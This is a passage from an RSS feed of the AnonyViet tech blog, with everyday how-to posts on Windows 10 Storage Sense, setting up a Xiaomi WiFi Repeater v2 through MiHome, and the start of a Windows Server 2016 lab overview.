{votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}">
<p>
            <span class="kksr-muted">Rate this post</span>
    </p>
</p></div>
</div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/how-to-configure-netdata-to-monitor-server-performance/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2023/04/cau-hinh-netdata-kiem-tra-server.jpg" medium="image"></media:content>
            	</item>
		<item>
		<title>Configure Storage Sense to automatically delete junk files to increase hard drive space</title>
		<link>https://en.anonyviet.com/configure-storage-sense-to-automatically-delete-junk-files-to-increase-hard-drive-space/</link>
					<comments>https://en.anonyviet.com/configure-storage-sense-to-automatically-delete-junk-files-to-increase-hard-drive-space/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Sun, 05 Feb 2023 15:48:49 +0000</pubDate>
				<category><![CDATA[Tips]]></category>
		<category><![CDATA[Automatically]]></category>
		<category><![CDATA[configure]]></category>
		<category><![CDATA[delete]]></category>
		<category><![CDATA[drive]]></category>
		<category><![CDATA[files]]></category>
		<category><![CDATA[hard]]></category>
		<category><![CDATA[increase]]></category>
		<category><![CDATA[junk]]></category>
		<category><![CDATA[Sense]]></category>
		<category><![CDATA[space]]></category>
		<category><![CDATA[Storage]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=9735</guid>

					<description><![CDATA[For those who are using laptops, the situation of full hard drive space is no longer rare. When users store a lot of data or install too much software, the hard drive does not have enough capacity. Especially for low-cost models, manufacturers often attach a low-capacity drive to save costs. Users today often add an [&#8230;]]]></description>
										<content:encoded><![CDATA[<p></p>
<div id="ftwp-postcontent">
<p style="text-align: justify;">For those who are using laptops, the situation of full hard drive space is no longer rare.  When users store a lot of data or install too much software, the hard drive does not have enough capacity.  Especially for low-cost models, manufacturers often attach a low-capacity drive to save costs.  Users today often add an SSD to speed up Windows 10, but SSDs have a high cost but low capacity.  To solve the problem of junk files taking up a lot of storage space, <a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fwww.microsoft.com%2Fen-us%2Fsoftware-download%2Fwindows10" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">Windows 10</a> the feature has been released <strong>Storage Sense.</strong></p>
<div class="code-block code-block-16" style="margin: 8px 0; clear: both;">
<div align="center">
<table class=" aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
<td style="width: 100%; text-align: center;"><span style="font-size: 12pt;"><strong>Join the channel <span style="color: #0000ff;">Telegram</span> belong to <span style="color: #008080;">AnonyViet </span> 👉 <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietchat" class="local-link" rel="noopener">Link</a></span>  👈</strong></span></td>
</tr>
</tbody>
</table>
</div>
</div>
<h2 id="ftoc-cau-hinh-storage-sense-tu-dong-xoa-file-rac-de-tang-dung-luong-o-cung" class="ftwp-heading" style="text-align: justify;">Configure Storage Sense to automatically delete junk files to increase hard drive space</h2>
<p style="text-align: justify;"><strong>Windows 10</strong> now allow you <strong><span style="color: #0000ff;">automatic</span> <span style="color: #ff0000;">delete old data</span></strong> according to a set schedule<span class="">.</span> This is a useful feature, especially for Windows 10 users whose laptops have a small hard drive, especially if using a hard drive. <strong>SSD</strong>.  This saving storage feature is called <strong>Storage Sense.</strong></p>
<p style="text-align: justify;">To turn on the mode <strong>Storage Sense </strong>you follow these steps:</p>
<ul style="text-align: justify;">
<li style="text-align: left;">Enter <strong>Settings</strong> => <strong>System</strong> => <strong>Storage</strong> and turn on the button <strong>Storage Sense</strong> go up.</li>
<li>Click on <strong>Change how we free up space automatically</strong></li>
</ul>
<p style="text-align: justify;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2018%2F12%2FStorage-Sense.jpeg" rel="noopener" class="local-link"><img decoding="async" class="aligncenter wp-image-13000" src="https://anonyviet.com/wp-content/uploads/2018/12/Storage-Sense.jpeg" alt="Turn on the Storage Sense function" width="560" height="379" srcset="https://anonyviet.com/wp-content/uploads/2018/12/Storage-Sense.jpeg 768w, https://anonyviet.com/wp-content/uploads/2018/12/Storage-Sense-300x203.jpeg 300w, https://anonyviet.com/wp-content/uploads/2018/12/Storage-Sense-750x508.jpeg 750w" sizes="(max-width: 560px) 100vw, 560px" title="Configure Storage Sense to automatically delete junk files to increase hard drive space by 9"/></a></p>
<h3 id="ftoc-run-storage-sense" class="ftwp-heading" style="text-align: justify;"><strong><span style="font-size: 14pt; color: #0000ff;">Run Storage Sense:</span></strong></h3>
<p style="text-align: justify;">You choose the time for Windows to schedule junk file deletion.  You can choose to scan by: daily, weekly, monthly or let Windows decide for itself.  If you use the drive <strong>SSD</strong> then you should let <em><strong>every month</strong>.</em> If the hard drive has a large storage capacity, select <em><strong>When Windows decides. </strong></em>Windows will decide when to delete junk files.<em><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2018%2F12%2Fstore-sence.jpg" rel="noopener" class="local-link"><img decoding="async" loading="lazy" class="aligncenter wp-image-13001" src="https://anonyviet.com/wp-content/uploads/2018/12/store-sence.jpg" alt="Run Storage Sense" width="412" height="185" srcset="https://anonyviet.com/wp-content/uploads/2018/12/store-sence.jpg 570w, https://anonyviet.com/wp-content/uploads/2018/12/store-sence-300x135.jpg 300w" sizes="auto, (max-width: 412px) 100vw, 412px" title="Configure Storage Sense to automatically delete junk files to increase hard drive space by 10"/></a></em></p>
<h3 id="ftoc-temporary-files-cho-phep-ban-tuy-chon-de-giai-phong-dung-luong-o-cung" class="ftwp-heading" style="text-align: justify;"><strong><span style="font-size: 14pt; color: #0000ff;"> Temporary Files: gives you the option to free up hard drive space:</span></strong></h3>
<p style="text-align: justify;">Normally, the 2 folders that always take up the most hard drive are <span style="color: #ff0000;"><strong>Trash can</strong></span>  and folder <span style="color: #ff0000;"><strong>Download</strong></span>.  You often download and use it but forget to delete them.  Windows 10 has allowed you<strong> automatic scheduling</strong> to free up space for these 2 folders.  You can choose to delete unused data within 1 day, 14 days, 30 days or 60 days.</p>
<p style="text-align: justify;">You need <strong>Check</strong> enter <em>Delete Temporary file that my apps aren&#8217;t using.</em></p>
<ul style="text-align: justify;">
<li><strong>Delete files in my recycle bin if they have been there for over:</strong> empty the recycle bin (<a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Flen-lich-tu-dong-xoa-sach-thung-rac%2F" rel="noopener" class="local-link">Empty </a><span style="font-weight: 400;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Flen-lich-tu-dong-xoa-sach-thung-rac%2F" rel="noopener" class="local-link">Recycle bin</a>)</span></li>
<li><strong>Delete files in my Downloads folder if they have been there for over:</strong> delete the downloaded file in the Download folder</li>
</ul>
<p style="text-align: justify;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2018%2F12%2Fdelete-file-1.jpg" rel="noopener" class="local-link"><img decoding="async" loading="lazy" class="aligncenter wp-image-13002" src="https://anonyviet.com/wp-content/uploads/2018/12/delete-file-1.jpg" alt="Temporary Files" width="425" height="211" srcset="https://anonyviet.com/wp-content/uploads/2018/12/delete-file-1.jpg 614w, https://anonyviet.com/wp-content/uploads/2018/12/delete-file-1-300x149.jpg 300w, https://anonyviet.com/wp-content/uploads/2018/12/delete-file-1-360x180.jpg 360w" sizes="auto, (max-width: 425px) 100vw, 425px" title="Configure Storage Sense to automatically delete junk files to increase hard drive space by 11"/></a></p>
<h3 id="ftoc-free-up-space-now-giai-phong-dung-luong-o-cung-ngay-lap-tuc" class="ftwp-heading" style="text-align: justify;"><strong><span style="font-size: 14pt; color: #0000ff;">Free up space now: Free up hard drive space immediately</span></strong></h3>
<p style="text-align: justify;"><strong>Storage Sense </strong>It also allows you to free up space instantly.  If you have too little hard drive space left.  The . button can be clicked <strong>Clean Now</strong> Let Windows do the cleaning.  It takes a few minutes for Windows to calculate the data to delete.  And the hard drive will increase the free space quickly.</p>
<p style="text-align: justify;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2018%2F12%2Ffree-up-now.jpg" rel="noopener" class="local-link"><img decoding="async" loading="lazy" class="aligncenter wp-image-13003 size-full" src="https://anonyviet.com/wp-content/uploads/2018/12/free-up-now.jpg" alt="Free up space now: Free up hard drive space immediately" width="589" height="193" srcset="https://anonyviet.com/wp-content/uploads/2018/12/free-up-now.jpg 589w, https://anonyviet.com/wp-content/uploads/2018/12/free-up-now-300x98.jpg 300w" sizes="auto, (max-width: 589px) 100vw, 589px" title="Configure Storage Sense to automatically delete junk files to increase hard drive space by 12"/></a></p>
<p style="text-align: justify;">Windows already has tools available <strong>Storage Sense</strong> to assist you in clearing junk data.  So you don&#8217;t need to install any more <a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fccleaner-professional-plus-business-technician-edition-portable-full%2F" rel="noopener" class="local-link">junk scanning software</a> half.  Just choose the right time, Windows will automatically free up hard drive space for you.  Feature <strong>Storage Sense</strong> essential if you use a low capacity SSD or your hard drive is running low on storage.</p>
<div class="kk-star-ratings kksr-auto kksr-align-right kksr-valign-bottom" data-payload="{&quot;align&quot;:&quot;right&quot;,&quot;id&quot;:&quot;12951&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;bottom&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;100&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;5&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;\u0110\u00e1nh gi\u00e1 b\u00e0i vi\u1ebft post&quot;,&quot;legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: 5\/5 - (100 b\u00ecnh ch\u1ecdn)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;width&quot;:&quot;142.5&quot;,&quot;_legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: {score}\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}">
<p>            The article achieved: 5/5 &#8211; (100 votes)    </p>
</p></div>
</div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/configure-storage-sense-to-automatically-delete-junk-files-to-increase-hard-drive-space/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2018/12/Storage-Sense-w10.jpg" medium="image"></media:content>
            	</item>
		<item>
		<title>What is repeater?  How to configure Wifi Xiaomi Repeater version 2</title>
		<link>https://en.anonyviet.com/what-is-repeater-how-to-configure-wifi-xiaomi-repeater-version-2/</link>
					<comments>https://en.anonyviet.com/what-is-repeater-how-to-configure-wifi-xiaomi-repeater-version-2/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Fri, 27 Jan 2023 01:49:13 +0000</pubDate>
				<category><![CDATA[Network]]></category>
		<category><![CDATA[configure]]></category>
		<category><![CDATA[repeater]]></category>
		<category><![CDATA[version]]></category>
		<category><![CDATA[WiFi]]></category>
		<category><![CDATA[Xiaomi]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=4508</guid>

					<description><![CDATA[Install the most complete Wifi Xiaomi Repeater version 2 Join the channel Telegram of the AnonyViet 👉 Link 👈 Hello friends, today I will come to you with an article about network devices Wifi Xiaomi Repeater version 2. Used to broadcast for Wifi, and fully configured including Wifi name and Password, and hidden SSID (Wifi [&#8230;]]]></description>
										<content:encoded><![CDATA[<p></p>
<div id="ftwp-postcontent">
<p style="text-align: center;"><span style="font-size: 18pt; color: #3366ff;">Install the most complete Wifi Xiaomi Repeater version 2</span></p>
<div class="code-block code-block-16" style="margin: 8px 0; clear: both;">
<div align="center">
<table class=" aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
<td style="width: 100%; text-align: center;"><span style="font-size: 12pt;"><strong>Join the channel <span style="color: #0000ff;">Telegram</span> of the <span style="color: #008080;">AnonyViet </span> 👉 <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietchat" class="local-link" rel="noopener">Link</a></span>  👈</strong></span></td>
</tr>
</tbody>
</table>
</div>
</div>
<p style="text-align: justify;">Hello friends, today I will come to you with an article about network devices <strong>Wifi Xiaomi Repeater version 2. </strong>Used to broadcast for Wifi, and fully configured including Wifi name and Password, and hidden SSID (Wifi name) feature.</p>
<h2 id="ftoc-repeater-la-gi" class="ftwp-heading" style="text-align: justify;"><span style="color: #800080;"><strong>What is repeater? </strong></span></h2>
<p style="text-align: justify;">First we need to find out what a Repeater is.  Repeater is a network device <span style="color: #3366ff;">retransmit</span> a signal received <span style="color: #800080;">effective</span> amplify the area and strength of the Wifi broadcast compared to the signal of the original original device.</p>
<p style="text-align: justify;">Using the Repeater device, you do not need to pull network cables to the device, all configurations are installed via Wifi, thus solving the aesthetic needs of the house, and mobility when you want to move. device transfer</p>
<p style="text-align: justify;"><img post-id="4508" fifu-featured="1" decoding="async" class="aligncenter" src="https://anonyviet.com/wp-content/uploads/2017/11/hqdefault.jpg" alt="What is repeater?  How to configure Wifi Xiaomi Repeater version 2" title="What is repeater?  How to configure Wifi Xiaomi Repeater version 2" width="480" height="360" title="What is repeater?  How to configure Wifi Xiaomi Repeater version 2 17"/></p>
<h3 id="ftoc-minh-lay-vi-du-don-gian-the-nay" class="ftwp-heading" style="text-align: justify;"><span style="color: #008000; font-size: 18pt;">I take this simple example</span></h3>
<h4 id="ftoc-vi-du-ve-viec-mo-rong-wifi-cho-nha-o-co-quan-cong-ty" class="ftwp-heading" style="text-align: justify;"><span style="font-size: 14pt; color: #808000;">Example of expanding Wifi for home, office, company</span></h4>
<p style="text-align: justify;">Your house has 3 floors, but the post office pulls an Internet Modem with built-in Wifi on the ground floor.  Then your Wifi is only enough to broadcast for the ground floor and 2nd floor</p>
<p style="text-align: justify;"><span style="color: #ff0000;">==> The 3rd floor is completely unable to catch the wave, or the wave is very weak.</span></p>
<p style="text-align: justify;"><strong>Purpose</strong> Your question now is how to get Wifi signal on the 3rd floor, but <span style="color: #3366ff;"><em>no need to drag the cord.</em></span> So please use Modem or USB devices with Repeater function located on the 2nd floor, so that you can connect to the 3rd floor or the terrace.</p>
<h4 id="ftoc-vi-du-ve-viec-bat-ke-wifi-cua-hang-xom-hoac-quan-cafe-ve-lam-wifi-nha-minh" class="ftwp-heading" style="text-align: justify;"><span style="font-size: 14pt; color: #808000;">Example of taking a neighbor&#8217;s Wifi or a coffee shop to make your home Wifi</span></h4>
<p style="text-align: justify;">If there is a cafe near your house, but in your house, it is very weak or can not catch wifi from that cafe, then take advantage of the repeater function to increase the ability of Wifi coverage to your home.</p>
<p style="text-align: justify;">Just place the device with the signal amplification function in the middle position (such as in the front yard, or on the terrace) as a bridge to transmit wifi from the cafe to the house.</p>
<p style="text-align: justify;"><img decoding="async" loading="lazy" class="alignnone" src="https://anonyviet.com/wp-content/uploads/2017/11/repeater_working.jpg" alt="repeater xiaomi" width="614" height="306" title="What is repeater?  How to configure Wifi Xiaomi Repeater version 2 18"/></p>
<h2 id="ftoc-nen-chon-thiet-bi-repeater-nao" class="ftwp-heading" style="text-align: justify;"><span style="color: #800080;"><strong>Which Repeater device should I choose?</strong></span></h2>
<p style="text-align: justify;">In my opinion, there are many devices nowadays <strong>USB repeater</strong> The price on the market is only about 90k to 200k, in addition, you can take advantage of Wifi Routers like <span class="irc_pt" dir="ltr">TPLINK WR740N, or TPLINK 841..</span>.</p>
<p style="text-align: justify;">In batches <strong>Flash sale on Shopee</strong> Recently, I bought 3 most popular devices today <span style="color: #3366ff;"><strong>Mercuri</strong> , <span style="color: #339966;"><strong><span style="color: #808000;">TOPOLink</span>,</strong></span></span><span style="color: #339966;"><strong> WIFI </strong></span><strong><span style="color: #008000;">Xiaomi Repeater Version 2</span></strong>  in the price range of about 109k.  According to my self-examination, I see  <span style="color: #3366ff;"><strong>Mercuri </strong></span>More simple configuration than Wifi <span style="color: #008000;">Xiaomi Repeater Version 2</span>.  But in terms of broadcast stability, I think <span style="color: #008000;">Xiaomi </span> more stable and faster <span style="color: #3366ff;"><strong>Mercuri </strong></span>.</p>
<h2 id="ftoc-cau-hinh-wifi-xiaomi-repeater-version-2" class="ftwp-heading"><strong><span style="color: #800080;">Configure Wifi Xiaomi Repeater Version 2</span></strong></h2>
<p>The configuration of each type of device follows the manufacturer&#8217;s instructions.  Most people plug the device into an electrical outlet, then access the device&#8217;s IP to configure it.</p>
<p>But for Xiaomi devices, you must configure it on the MiHome application installed on the SmartPhone.</p>
<p>After downloading, create a Xiaomi account to manage all Xiaomi devices, very convenient if you later use all Xiaomi devices for your smart home.</p>
<h3 id="ftoc-cai-dat-locate" class="ftwp-heading"><span style="color: #0000ff;">Install Locate</span></h3>
<p>When installing MiHome, please note that you must <span style="color: #ff0000;"><strong>Locate</strong> </span>to be <span style="color: #333399;">Mainland</span> or <span style="color: #008000;">China <span style="color: #000000;">then you can use all the features of MiHome to install Wifi Xiaomi Repeater Version 2.</span></span></p>
<p>If you have chosen Locate as another country, go to Profile -> Settings -> Locate and then choose again <span style="color: #333399;">Mainland</span></p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2017%2F11%2Fxiaomi-locate.jpg" rel="noopener" class="local-link"><img decoding="async" loading="lazy" class="aligncenter wp-image-6943" src="https://anonyviet.com/wp-content/uploads/2017/11/xiaomi-locate.jpg" alt="What is repeater?  How to configure Wifi Xiaomi Repeater version 2 7" width="213" height="379" srcset="https://anonyviet.com/wp-content/uploads/2017/11/xiaomi-locate.jpg 640w, https://anonyviet.com/wp-content/uploads/2017/11/xiaomi-locate-169x300.jpg 169w, https://anonyviet.com/wp-content/uploads/2017/11/xiaomi-locate-577x1024.jpg 577w" sizes="auto, (max-width: 213px) 100vw, 213px" title="What is repeater?  How to configure Wifi Xiaomi Repeater version 2 19"/></a></p>
<h3 id="ftoc-them-thiet-bi-vao-mihome" class="ftwp-heading"><strong><span style="color: #0000ff;">Adding devices to MiHome</span></strong></h3>
<p>To start the configuration, you need to Add the device.  You return to the main screen and press the sign <strong>+</strong> in the upper right corner to add a new device</p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2017%2F11%2Fadd-xiaomi-repeater.jpg" rel="noopener" class="local-link"><img decoding="async" loading="lazy" class="aligncenter wp-image-6944" src="https://anonyviet.com/wp-content/uploads/2017/11/add-xiaomi-repeater.jpg" alt="What is repeater?  How to configure Wifi Xiaomi Repeater version 2 8" width="217" height="386" srcset="https://anonyviet.com/wp-content/uploads/2017/11/add-xiaomi-repeater.jpg 640w, https://anonyviet.com/wp-content/uploads/2017/11/add-xiaomi-repeater-169x300.jpg 169w, https://anonyviet.com/wp-content/uploads/2017/11/add-xiaomi-repeater-577x1024.jpg 577w" sizes="auto, (max-width: 217px) 100vw, 217px" title="What is repeater?  How to configure Wifi Xiaomi Repeater version 2 20"/></a></p>
<p style="text-align: center;">Then choose the right type of device <strong>Mi Wi-Fi Repeater 2</strong> as shown below</p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2017%2F11%2Fthem-thiet-bi.jpg" rel="noopener" class="local-link"><img decoding="async" loading="lazy" class="aligncenter wp-image-6945" src="https://anonyviet.com/wp-content/uploads/2017/11/them-thiet-bi.jpg" alt="What is repeater?  How to configure Wifi Xiaomi Repeater version 2 9" width="220" height="392" srcset="https://anonyviet.com/wp-content/uploads/2017/11/them-thiet-bi.jpg 640w, https://anonyviet.com/wp-content/uploads/2017/11/them-thiet-bi-169x300.jpg 169w" sizes="auto, (max-width: 220px) 100vw, 220px" title="What is repeater?  How to configure Wifi Xiaomi Repeater version 2 21"/></a></p>
<h3 id="ftoc-cau-hinh-thiet-bi-de-phat-song-wifi" class="ftwp-heading"><strong><span style="color: #0000ff;">Configure the device to broadcast Wifi</span></strong></h3>
<p style="text-align: center;">On the next screen, check the box Yellow light blinking</p>
<p><img decoding="async" loading="lazy" class="aligncenter" src="https://anonyviet.com/wp-content/uploads/2017/11/huong-dan-ket-noi-bo-khuech-dai-song-wifi-xiaomi-mi-wifi-repeater-06.jpg" alt="Huong Dan has a long phone call, but xiaomi mi chooses yellow light flashing and next" width="176" height="314" title="What is repeater?  How to configure Wifi Xiaomi Repeater version 2 22"/></p>
<p style="text-align: center;">Select the correct Wifi name you need to expand the broadcasting range, then enter the password of that Wifi name then select “Next”</p>
<p><img decoding="async" loading="lazy" class="aligncenter" src="https://anonyviet.com/wp-content/uploads/2017/11/huong-dan-ket-noi-bo-khuech-dai-song-wifi-xiaomi-mi-wifi-repeater-011.jpg" alt="Huong dan connected to the long -butch xiaomi mi is in the same time" width="215" height="382" title="What is repeater?  How to configure Wifi Xiaomi Repeater version 2 23"/></p>
<p style="text-align: center;">Next, select <strong>Go to set Wi-Fi</strong> to switch to the Wifi connection on the phone</p>
<p><img decoding="async" loading="lazy" class="aligncenter" src="https://anonyviet.com/wp-content/uploads/2017/11/huong-dan-ket-noi-bo-khuech-dai-song-wifi-xiaomi-mi-wifi-repeater-014.jpg" alt="it's nice to have a phone, but the xiaomi mi screen will show up" width="247" height="437" title="What is repeater?  How to configure Wifi Xiaomi Repeater version 2 24"/></p>
<p style="text-align: center;">You double-click the home button on the iPhone screen to go to the settings then select the WiFi of the Xiaomi Mi range extender.</p>
<p><img decoding="async" loading="lazy" class="aligncenter" src="https://anonyviet.com/wp-content/uploads/2017/11/huong-dan-ket-noi-bo-khuech-dai-song-wifi-xiaomi-mi-wifi-repeater-09.jpg" alt="how long does it take to connect to the phone, but xiaomi mi chooses to connect to wifi?" width="229" height="408" title="What is repeater?  How to configure Wifi Xiaomi Repeater version 2 25"/></p>
<p>– Then go back to MiHome application and wait for connecting.. to finish, Select “Experience”</p>
<p><img decoding="async" loading="lazy" class="aligncenter" src="https://anonyviet.com/wp-content/uploads/2017/11/huong-dan-ket-noi-bo-khuech-dai-song-wifi-xiaomi-mi-wifi-repeater-015.jpg" alt="The wife has reached the center of the house, but xiaomi mi is back in mihome and connec" width="232" height="413" title="What is repeater?  How to configure Wifi Xiaomi Repeater version 2 26"/></p>
<p style="text-align: center;">When it reaches 100%, you will see a successful connection message <strong>Connect success</strong>.</p>
<p style="text-align: center;">(If at this stage it reports to 100% but fails, then please change Locate to mainland as I instructed above)</p>
<p style="text-align: center;">Now click on Experience  <img decoding="async" loading="lazy" class="aligncenter" src="https://anonyviet.com/wp-content/uploads/2017/11/huong-dan-ket-noi-bo-khuech-dai-song-wifi-xiaomi-mi-wifi-repeater-012.jpg" alt="Huong dan connectors to the dai dai song xiaomi mi chose Experience" width="227" height="403" title="What is repeater?  How to configure Wifi Xiaomi Repeater version 2 27"/></p>
<p style="text-align: center;">The interface to reconfigure the Wifi name or change the password for the Repeater unit</p>
<p><img decoding="async" loading="lazy" class="aligncenter" src="https://anonyviet.com/wp-content/uploads/2017/11/huong-dan-ket-noi-bo-khuech-dai-song-wifi-xiaomi-mi-wifi-repeater-016.jpg" alt="It's time to say goodbye to xiaomi mi and finished" width="246" height="436" title="What is repeater?  How to configure Wifi Xiaomi Repeater version 2 28"/></p>
<p class="pclear">When the configuration is successful, you go to search for Wifi on your phone or laptop and you will see an additional Wifi wave column with the word<span style="color: #800080;"><strong>  _plus</strong></span>  behind.</p>
<p>In just a few simple steps, you can increase the broadcast capacity of your home Wifi.  Good luck</p>
</p>
<div class="kk-star-ratings kksr-auto kksr-align-right kksr-valign-bottom" data-payload="{&quot;align&quot;:&quot;right&quot;,&quot;id&quot;:&quot;6939&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;bottom&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;100&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;5&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;\u0110\u00e1nh gi\u00e1 b\u00e0i vi\u1ebft post&quot;,&quot;legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: 5\/5 - (100 b\u00ecnh ch\u1ecdn)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;width&quot;:&quot;142.5&quot;,&quot;_legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: {score}\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}">
<p>            The article achieved: 5/5 &#8211; (100 votes)    </p>
</p></div>
</div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/what-is-repeater-how-to-configure-wifi-xiaomi-repeater-version-2/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2017/11/hqdefault.jpg" medium="image"></media:content>
            	</item>
		<item>
		<title>Lab install and configure Windows Server 2016</title>
		<link>https://en.anonyviet.com/lab-install-and-configure-windows-server-2016/</link>
					<comments>https://en.anonyviet.com/lab-install-and-configure-windows-server-2016/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Fri, 27 Jan 2023 01:29:42 +0000</pubDate>
				<category><![CDATA[Network]]></category>
		<category><![CDATA[configure]]></category>
		<category><![CDATA[install]]></category>
		<category><![CDATA[Lab]]></category>
		<category><![CDATA[Server]]></category>
		<category><![CDATA[Windows]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=4496</guid>

					<description><![CDATA[Following the generation of Windows Server 2012, Microsoft has released a version of Windows Server 2016 with more innovative and powerful features, compatible with virtualization environments, and cloud computing. Join the channel Telegram of the AnonyViet 👉 Link 👈 Fortunately, AnonyViet has collected almost a complete set of Labs for Windows Server 2016 (equivalent to [&#8230;]]]></description>
										<content:encoded><![CDATA[<p></p>
<div id="ftwp-postcontent">
<p><strong>Following the generation of Windows Server 2012, Microsoft has released a version of Windows Server 2016 with more innovative and powerful features, compatible with virtualization environments, and cloud computing.</strong></p>
<div class="code-block code-block-16" style="margin: 8px 0; clear: both;">
<div align="center">
<table class=" aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
<td style="width: 100%; text-align: center;"><span style="font-size: 12pt;"><strong>Join the channel <span style="color: #0000ff;">Telegram</span> of the <span style="color: #008080;">AnonyViet </span> 👉 <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietchat" class="local-link" rel="noopener">Link</a></span>  👈</strong></span></td>
</tr>
</tbody>
</table>
</div>
</div>
<p>Fortunately, AnonyViet has collected almost a complete set of Labs for Windows Server 2016 (equivalent to MCSA) to serve network administrators to capture and configure Server in the most efficient and fastest way.</p>
<h2 id="ftoc-nhung-diem-moi-cua-windows-server-2016" class="ftwp-heading"><span style="color: #800080;"><strong>New features of Windows Server 2016</strong></span></h2>
<p class="lf-text-block lf-block" data-lf-anchor-id="03952ced439f36fb13c9e0426b185ed7:0"><span style="color: #0000ff;"><em>The content in this section describes what&#8217;s new and changed in Windows Server 2016. The new features and changes listed here are the ones that are likely to have the biggest impact as you work with this release.</em></span></p>
<p data-lf-anchor-id="03952ced439f36fb13c9e0426b185ed7:0"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2017%2F12%2F24-11-2017-09-19-181.jpeg" rel="noopener" class="local-link"><img post-id="4496" fifu-featured="1" decoding="async" class="aligncenter size-full wp-image-12740" src="https://anonyviet.com/wp-content/uploads/2017/12/24-11-2017-09-19-181.jpeg" alt="Lab install and configure Windows Server 2016" title="Lab install and configure Windows Server 2016" width="743" height="377" srcset="https://anonyviet.com/wp-content/uploads/2017/12/24-11-2017-09-19-181.jpeg 743w, https://anonyviet.com/wp-content/uploads/2017/12/24-11-2017-09-19-181-300x152.jpeg 300w" sizes="(max-width: 743px) 100vw, 743px" title="Lab install and configure Windows Server 2016 7"/></a></p>
<p class="lf-text-block lf-block" data-lf-anchor-id="8f4629274d8544df2b29891a49417752:0">The virtualization area includes virtualization products and features for IT professionals to design, deploy, and maintain Windows Server.</p>
<h3 id="hyper-v" class="ftwp-heading"><strong>Hyper-DRAW</strong></h3>
<ul class="lf-text-block lf-block" data-lf-anchor-id="8f1d2d0d3506011d5841898241135e72:0">
<li>What&#8217;s New in Hyper-V on Windows Server 2016.  This topic explains the new functionality and changes of the Hyper-V role in Windows Server 2016, the Hyper-V client running on Windows 10, and Microsoft Hyper-V Server 2016.</li>
<li>The Containers window: Windows Server 2016 support contains additional performance improvements, simplified network management, and support for Containers on Windows 10.</li>
</ul>
